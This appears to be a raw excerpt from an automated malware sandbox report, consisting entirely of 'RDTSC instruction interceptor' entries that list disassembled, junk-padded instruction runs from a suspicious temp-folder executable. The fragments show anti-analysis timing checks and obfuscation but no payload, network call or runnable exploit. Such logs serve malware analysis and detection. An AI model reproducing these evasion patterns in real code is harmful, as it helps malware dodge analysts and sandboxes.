Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50E0E90 second address: 50E0EB0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dh, ch 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push edx 0x0000000d pop eax 0x0000000e jmp 00007F47311907B1h 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50F011B second address: 50F011F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50F011F second address: 50F0123 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50F0123 second address: 50F0129 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50F0129 second address: 50F012E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50F012E second address: 50F0176 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F473118FE5Fh 0x00000009 pop ecx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push edx 0x0000000e jmp 00007F473118FE64h 0x00000013 mov dword ptr [esp], ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F473118FE67h 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50F0176 second address: 50F01BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47311907B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c mov ebx, ecx 0x0000000e mov esi, 36364F9Fh 0x00000013 popad 0x00000014 pop ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 mov al, bl 0x0000001a call 00007F47311907B8h 0x0000001f pop eax 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50F01BE second address: 50F01C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50F01C4 second address: 50F01C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50F01C8 second address: 50F01CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 5110786 second address: 511079B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47311907B1h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 511079B second address: 5110830 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F473118FE61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov bx, cx 0x00000010 push esi 0x00000011 mov si, di 0x00000014 pop ebx 0x00000015 popad 0x00000016 push eax 0x00000017 pushad 0x00000018 call 00007F473118FE67h 0x0000001d mov edx, eax 0x0000001f pop esi 0x00000020 mov al, bh 0x00000022 popad 0x00000023 xchg eax, ebp 0x00000024 pushad 0x00000025 jmp 00007F473118FE5Ah 0x0000002a pushfd 0x0000002b jmp 00007F473118FE62h 0x00000030 and ecx, 097AC888h 0x00000036 jmp 00007F473118FE5Bh 0x0000003b popfd 0x0000003c popad 0x0000003d mov ebp, esp 0x0000003f jmp 00007F473118FE66h 0x00000044 xchg eax, ecx 0x00000045 push eax 0x00000046 push edx 0x00000047 pushad 0x00000048 movsx ebx, ax 0x0000004b mov cl, 09h 0x0000004d popad 0x0000004e rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 5110830 second address: 511084B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47311907B7h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 511084B second address: 5110861 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F473118FE5Bh 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 5110861 second address: 5110884 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47311907B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 5110884 second address: 511088C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cx, bx 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 511088C second address: 5110920 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F47311907B0h 0x00000009 sub cx, 6D38h 0x0000000e jmp 00007F47311907ABh 0x00000013 popfd 0x00000014 call 00007F47311907B8h 0x00000019 pop eax 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d mov eax, dword ptr [76FA65FCh] 0x00000022 pushad 0x00000023 mov di, 0762h 0x00000027 jmp 00007F47311907B3h 0x0000002c popad 0x0000002d test eax, eax 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 pushfd 0x00000033 jmp 00007F47311907ABh 0x00000038 sbb esi, 7FAF250Eh 0x0000003e jmp 00007F47311907B9h 0x00000043 popfd 0x00000044 mov bx, ax 0x00000047 popad 0x00000048 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 5110920 second address: 511096D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F473118FE63h 0x00000008 pop esi 0x00000009 mov dh, 89h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e je 00007F47A2FA2E80h 0x00000014 jmp 00007F473118FE60h 0x00000019 mov ecx, eax 0x0000001b jmp 00007F473118FE60h 0x00000020 xor eax, dword ptr [ebp+08h] 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 511096D second address: 5110973 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 5110A4F second address: 5110AF9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F473118FE69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F473118FE5Ch 0x00000011 sbb esi, 5EE8D0E8h 0x00000017 jmp 00007F473118FE5Bh 0x0000001c popfd 0x0000001d call 00007F473118FE68h 0x00000022 push ecx 0x00000023 pop edi 0x00000024 pop eax 0x00000025 popad 0x00000026 push eax 0x00000027 pushad 0x00000028 pushfd 0x00000029 jmp 00007F473118FE5Ah 0x0000002e adc ecx, 5255AE78h 0x00000034 jmp 00007F473118FE5Bh 0x00000039 popfd 0x0000003a pushfd 0x0000003b jmp 00007F473118FE68h 0x00000040 xor eax, 1489C8D8h 0x00000046 jmp 00007F473118FE5Bh 0x0000004b popfd 0x0000004c popad 0x0000004d xchg eax, ebp 0x0000004e pushad 0x0000004f pushad 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 5110AF9 second address: 5110B34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F47311907B0h 0x0000000a xor cl, 00000038h 0x0000000d jmp 00007F47311907ABh 0x00000012 popfd 0x00000013 popad 0x00000014 mov bx, ax 0x00000017 popad 0x00000018 mov ebp, esp 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F47311907ACh 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 5110B34 second address: 5110B3A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50C0008 second address: 50C0038 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, 5FD7h 0x00000007 pushfd 0x00000008 jmp 00007F47311907ACh 0x0000000d sbb esi, 03162A48h 0x00000013 jmp 00007F47311907ABh 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, ebp 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50C0038 second address: 50C003C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50C003C second address: 50C0040 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50C0040 second address: 50C0046 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50C0046 second address: 50C005B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47311907AAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50C005B second address: 50C0077 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F473118FE68h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50C0077 second address: 50C0089 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47311907AEh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50C0089 second address: 50C00AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F473118FE5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F473118FE60h 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50C00AF second address: 50C00B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50C00B3 second address: 50C00B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50C00B9 second address: 50C0143 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F47311907B3h 0x00000008 pop esi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebp, esp 0x0000000e jmp 00007F47311907AFh 0x00000013 and esp, FFFFFFF8h 0x00000016 pushad 0x00000017 mov ebx, ecx 0x00000019 push esi 0x0000001a mov cx, di 0x0000001d pop ebx 0x0000001e popad 0x0000001f xchg eax, ecx 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007F47311907ABh 0x00000029 and eax, 562FD76Eh 0x0000002f jmp 00007F47311907B9h 0x00000034 popfd 0x00000035 pushfd 0x00000036 jmp 00007F47311907B0h 0x0000003b adc ax, 6AE8h 0x00000040 jmp 00007F47311907ABh 0x00000045 popfd 0x00000046 popad 0x00000047 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50C0143 second address: 50C017B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F473118FE69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F473118FE61h 0x0000000f xchg eax, ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov si, 2F45h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50C017B second address: 50C0212 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F47311907B1h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebx 0x0000000e pushad 0x0000000f mov ah, DAh 0x00000011 pushfd 0x00000012 jmp 00007F47311907AFh 0x00000017 adc ecx, 7C43AD9Eh 0x0000001d jmp 00007F47311907B9h 0x00000022 popfd 0x00000023 popad 0x00000024 push eax 0x00000025 pushad 0x00000026 movsx edi, si 0x00000029 pushfd 0x0000002a jmp 00007F47311907B8h 0x0000002f xor ecx, 54EEA6C8h 0x00000035 jmp 00007F47311907ABh 0x0000003a popfd 0x0000003b popad 0x0000003c xchg eax, ebx 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007F47311907B5h 0x00000044 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50C0212 second address: 50C0222 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F473118FE5Ch 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50C0222 second address: 50C025D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47311907ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebx, dword ptr [ebp+10h] 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushfd 0x00000012 jmp 00007F47311907B2h 0x00000017 or si, B6B8h 0x0000001c jmp 00007F47311907ABh 0x00000021 popfd 0x00000022 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50C036C second address: 50C0393 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop esi 0x00000005 call 00007F473118FE67h 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, edi 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50C0393 second address: 50C0397 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50C0397 second address: 50C039D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50C039D second address: 50C0431 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, ax 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F47311907ADh 0x00000012 sbb esi, 226DDF06h 0x00000018 jmp 00007F47311907B1h 0x0000001d popfd 0x0000001e mov ebx, esi 0x00000020 popad 0x00000021 je 00007F47A2FEE9E9h 0x00000027 pushad 0x00000028 push eax 0x00000029 mov cx, dx 0x0000002c pop edi 0x0000002d pushfd 0x0000002e jmp 00007F47311907B0h 0x00000033 and al, FFFFFFD8h 0x00000036 jmp 00007F47311907ABh 0x0000003b popfd 0x0000003c popad 0x0000003d cmp dword ptr [esi+08h], DDEEDDEEh 0x00000044 pushad 0x00000045 movzx esi, bx 0x00000048 mov dx, ECB4h 0x0000004c popad 0x0000004d je 00007F47A2FEE9C2h 0x00000053 jmp 00007F47311907B3h 0x00000058 mov edx, dword ptr [esi+44h] 0x0000005b push eax 0x0000005c push edx 0x0000005d push eax 0x0000005e push edx 0x0000005f pushad 0x00000060 popad 0x00000061 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50C0431 second address: 50C0435 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50C0435 second address: 50C043B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50C043B second address: 50C048C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F473118FE5Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 or edx, dword ptr [ebp+0Ch] 0x0000000c jmp 00007F473118FE60h 0x00000011 test edx, 61000000h 0x00000017 pushad 0x00000018 pushad 0x00000019 mov bx, ax 0x0000001c mov bh, ch 0x0000001e popad 0x0000001f jmp 00007F473118FE65h 0x00000024 popad 0x00000025 jne 00007F47A2FEE05Eh 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50C048C second address: 50C0490 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50C0490 second address: 50C0494 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50C0494 second address: 50C049A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50C049A second address: 50C04A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50C04A0 second address: 50C04C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47311907ACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test byte ptr [esi+48h], 00000001h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov eax, edx 0x00000014 mov edx, 26DB8FCCh 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50C04C1 second address: 50C0501 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ch, 55h 0x00000005 pushfd 0x00000006 jmp 00007F473118FE5Dh 0x0000000b sub al, FFFFFFA6h 0x0000000e jmp 00007F473118FE61h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 jne 00007F47A2FEE00Bh 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F473118FE5Dh 0x00000024 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50C0501 second address: 50C0507 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50C0507 second address: 50C050B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50B0817 second address: 50B081E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50B081E second address: 50B0824 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50B0824 second address: 50B0872 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47311907B2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e pushad 0x0000000f jmp 00007F47311907AEh 0x00000014 mov ch, B3h 0x00000016 popad 0x00000017 mov ebp, esp 0x00000019 jmp 00007F47311907ADh 0x0000001e and esp, FFFFFFF8h 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F47311907ADh 0x00000028 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50B0872 second address: 50B0878 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50B0878 second address: 50B087C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50B087C second address: 50B088F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov edi, 60A33764h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50B088F second address: 50B0894 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50B0894 second address: 50B089A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50B089A second address: 50B089E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50B089E second address: 50B08A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50B08A2 second address: 50B08BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F47311907ADh 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50B08BC second address: 50B08DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F473118FE61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d mov eax, 72466619h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50B08DA second address: 50B0926 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47311907B6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 call 00007F47311907B2h 0x0000000e movzx esi, bx 0x00000011 pop edi 0x00000012 popad 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F47311907B8h 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50B0926 second address: 50B0968 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F473118FE5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007F473118FE66h 0x0000000f mov esi, dword ptr [ebp+08h] 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F473118FE67h 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50B0968 second address: 50B09AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47311907B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub ebx, ebx 0x0000000b pushad 0x0000000c mov di, 2940h 0x00000010 mov dh, 99h 0x00000012 popad 0x00000013 test esi, esi 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F47311907B7h 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50B09AA second address: 50B0A01 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F473118FE5Fh 0x00000009 and si, 23CEh 0x0000000e jmp 00007F473118FE69h 0x00000013 popfd 0x00000014 mov eax, 1FBA81D7h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c je 00007F47A2FF5800h 0x00000022 jmp 00007F473118FE5Ah 0x00000027 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 pushad 0x00000032 popad 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: 50B0A01 second address: 50B0A3A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F47311907B2h 0x00000008 mov di, si 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov ecx, esi 0x00000010 pushad 0x00000011 mov cx, 9BF9h 0x00000015 popad 0x00000016 je 00007F47A2FF6125h 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F47311907AEh 0x00000023 rdtsc
